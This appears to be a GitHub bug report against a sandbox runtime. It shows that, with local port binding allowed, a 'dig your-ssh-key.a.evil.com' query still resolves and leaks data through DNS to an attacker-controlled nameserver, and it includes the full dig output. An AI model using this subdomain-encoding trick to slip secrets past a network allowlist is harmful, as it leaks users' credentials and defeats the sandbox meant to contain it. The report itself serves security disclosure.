settings.json { "network": { "allowedDomains": [], "deniedDomains": [], "allowLocalBinding": true }, "filesystem": { "denyRead": [], "allowWrite": [], "denyWrite": [] } } command srt --settings settings.json 'dig your-ssh-key.a.evil.com' EXPECTED evil.com domain is not on the allowed domains list, so this DNS query is blocked Allowing local port binding doesn't allow outbound network requests from inside the sandbox ACTUAL Data exfiltration: evil.com owners can set an NS record for a.evil.com, which causes Google/Cloudflare/all others to send the A your-ssh-key.a.evil.com query to evil.com-owned DNS servers. Any sandbox with local port binding enabled is liable for data exfiltration. ; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 512 ;; QUESTION SECTION: ;your-ssh-key.a.evil.com. IN A ;; ANSWER SECTION: your-ssh-key.a.evil.com. 3600 IN A 66.96.146.129 ;; Query time: 48 msec ;; SERVER: 192.168.0.1#53(192.168.0.1) ;; WHEN: Mon Jan 12 17:29:41 EST 2026 ;; MSG SIZE rcvd: 68 👍React with 👍2yelinaung and celadyn👀React with 👀3ethanzh, GhostScientist and hodgesmr
First seen: 2026-01-13 11:04
Last seen: 2026-01-13 11:04